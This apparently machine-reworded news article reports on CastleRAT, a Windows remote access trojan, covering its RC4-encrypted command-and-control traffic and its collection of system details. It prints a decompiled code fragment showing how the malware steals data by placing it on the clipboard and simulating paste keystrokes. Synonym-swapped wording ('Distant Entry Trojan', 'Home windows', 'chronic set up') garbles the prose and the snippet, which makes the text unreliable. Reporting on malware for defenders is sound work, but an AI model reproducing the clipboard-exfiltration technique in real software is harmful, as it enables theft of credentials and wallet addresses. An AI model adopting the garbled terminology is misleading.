A brand new Distant Entry Trojan often called CastleRAT has emerged as a rising risk to Home windows programs worldwide.
First noticed round March 2025, this malware allows attackers to realize full distant management over compromised machines.
The risk is available in two essential builds: a light-weight Python model and a extra highly effective compiled C model, with the latter providing superior capabilities together with keystroke seize, display grabs, and chronic set up strategies.
CastleRAT communicates with its command-and-control server utilizing RC4 encryption with a hardcoded key.
As soon as deployed, the malware collects system info similar to laptop title, username, machine GUID, public IP deal with, and product particulars, then transmits this knowledge to the attacker.
The contaminated host receives directions and extra instruments from the C2 server, permitting the attacker to execute instructions remotely.
Splunk safety researchers recognized that CastleRAT employs a number of refined strategies mapped to the MITRE ATT&CK framework.
The malware gathers fundamental system particulars and makes use of free net companies like ip-api.com to acquire public IP addresses for normal beaconing.
Clipboard Knowledge Assortment and Exfiltration
One notable approach entails clipboard knowledge harvesting. CastleRAT launches a number of threads inside its course of, with every thread finishing up totally different malicious actions.
The clipboard assortment thread targets customers who typically copy credentials or cryptocurrency addresses, making this an efficient methodology for harvesting delicate info like usernames, passwords, and pockets strings.
CastleRAT beacon and C2 communication move (Supply – Splunk)
The malware hijacks the clipboard and simulates paste actions to exfiltrate knowledge stealthily. Reasonably than opening community sockets or calling apparent community APIs, CastleRAT copies harvested info to the clipboard and invokes SendInput() to stick knowledge into benign-looking purposes.
CastleRAT Clipboard Knowledge Assortment (Supply – Splunk)
This method reduces noisy community artifacts and blends exfiltration into extraordinary consumer exercise, complicating detection efforts.
if (OpenClipboard (0164))
{
EmptyClipboard();
hMem = GlobalAlloc(0x2000u, v2 + 1);
Dest = GlobalLock(hMem);
strcpy(Dest, Supply);
SetClipboardData(1u, hMem);
CloseClipboard();
pInputs[0].ki.wVk = VK_CONTROL;
pInputs[2].ki.wVk = ‘V’;
SendInput(4u, pInputs, 40);
}
Organizations ought to monitor for uncommon outbound connections, one-line PowerShell downloads, surprising binaries in consumer folders, and indicators of RC4-encrypted site visitors to detect this risk.
Comply with us on Google Information, LinkedIn, and X to Get Extra Prompt Updates, Set CSN as a Most popular Supply in Google.
